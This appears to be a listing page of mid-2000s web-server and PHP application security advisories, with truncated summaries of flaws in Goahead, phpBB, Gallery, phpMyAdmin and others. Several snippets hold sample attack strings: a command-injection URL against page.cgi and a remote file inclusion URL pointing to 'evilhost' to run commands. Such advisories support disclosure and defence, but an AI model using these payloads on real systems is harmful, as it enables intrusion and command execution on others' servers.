BadBlue Webserver Connection Saturation Remote DoS
Binary data 2127.prm...
page.txt
Script affected: page.cgi - content/template merging CGI. Author: Andrew Kilpatrick. We can execute arbitrary commands with the same id as the webserver: http://www.vulnerable.com/page.cgi?url=.html|id| Thanks: Infektion Group irc.phey.net -j infektion...
phpBB 2.0.x - viewtopic.php PHP Script Injection
source: https://www.securityfocus.com/bid/10701/info The 'viewtopic.php' phpBB script is prone to a remote PHP script injection vulnerability because the application fails to properly sanitize user-supplied URI parameters before using them to...
DSA-516 postgresql - buffer overflow
Bulletin has no description...
Aldos Webserver multiple bugs
Information disclosure, directory traversal...
waraxe-2004-SA012.txt
waraxe-2004-SA012: Multiple vulnerabilities in XMB 1.8 Partagium SP3 and 1.9 Nexus Beta...
[ GLSA 200402-04 ] Gallery <= 1.4.1 and below remote exploit vulnerability
Gentoo Linux Security Advisory GLSA 200402-04 http://security.gentoo.org ...
Gallery 1.4.1 and below remote exploit vulnerability
Background: Gallery is an open source image management system written in PHP. More information is available at http://gallery.sourceforge.net Description: Starting in the 1.3.1 release, Gallery includes code to simulate the behaviour of the PHP 'register_globals' variable in environments where that...
PalmOShttpd.txt
Introduction 'httpd' for PalmOS was originally written by Jim Rees, and is a simple webserver for Palm powered PDAs. Since the development of httpd for Palm stopped, I decided to modify 'httpd' slightly, and re-release it on freshmeat.net. However, httpd contains a bug which causes the device to...
Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
Summary: phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW. There is a vulnerability in the current stable version of phpMyAdmin...
Kietu 23 - index.php Remote File Inclusion
source: https://www.securityfocus.com/bid/9499/info A flaw exists in the Kietu 'index.php' script that may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file, whi...
geoHTTP.txt
Software: GeoHttpServer Vendor: GEOVISION INC http://www.geovision.com.tw Versions: ALL Platforms: Unix Bug: Authentication Bypass Vulnerability & D.O.S Denial Of Service Risk: High Exploitation: Remote with browser Date: 22 Jan 2004 Author: Rafel Ivgi, The-Insider e-mail: [email protected]...
goahead.txt
Luigi Auriemma Application: Goahead webserver http://www.goahead.com/webserver/webserver.htm Versions: <= 2.1.8 Platforms: multiplatform Bug: resources consumption Risk: medium/high Exploitation: remote Date: 19 Jan 2004 Author: Luigi Auriemma e-mail: [email protected] web:...
goahead2.txt
Luigi Auriemma Application: Goahead webserver http://www.goahead.com/webserver/webserver.htm Versions: <= 2.1.8 Platforms: multiplatform Bug: bypassing of special directories management with the effect of downloading cgi-bin files and more Risk: medium/high Exploitation: remote with browser Date: ...
Resources consumption in Goahead webserver <= 2.1.8
Luigi Auriemma Application: Goahead webserver http://www.goahead.com/webserver/webserver.htm Versions: <= 2.1.8 Platforms: multiplatform Bug: resources consumption Risk: medium/high Exploitation: remote Date: 19 Jan 2004 Author: Luigi Auriemma e-mail: [email protected] web:...
Denial of service in Getware's built-in webserver (Webcam Live and Photohost)
Luigi Auriemma Application: Getware's built-in webserver http://www.getware.com Versions: WebCam Live = 2.01 Photohost = 4.0 Platforms: Windows Bug: Denial of service Risk: medium Exploitation: remote Date: 19 Jan 2004 Author: Luigi Auriemma e-mail: [email protected] web:...
Directories management bypassing in Goahead webserver <= 2.1.8
Luigi Auriemma Application: Goahead webserver http://www.goahead.com/webserver/webserver.htm Versions: <= 2.1.8 Platforms: multiplatform Bug: bypassing of special directories management with the effect of downloading cgi-bin files and more Risk: medium/high Exploitation: remote with browser Date: ...
aiptek netcam WebServer 0.93.15 - Directory Traversal
source: https://www.securityfocus.com/bid/9456/info It has been reported that the NETCam webserver of NETCam Viewer may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory. AIPTEK NETCam Viewer versions 1.0.0.28...
ezcontents.txt
Remote Code Execution in ezContents "ezContents" from www.ezcontents.org allows to execute code. Example: Create the following file on your webserver: ----index.php---- ----------------- And then type in the following URL: http://targethost/module.php?link=http://evilhost/index.php&cmd=cat...
CVE-2003-1318
Twilight Webserver 1.3.3.0 allows remote attackers to cause a denial of service (application crash) via a GET request for a long URI, a different vulnerability than CVE-2004-2376...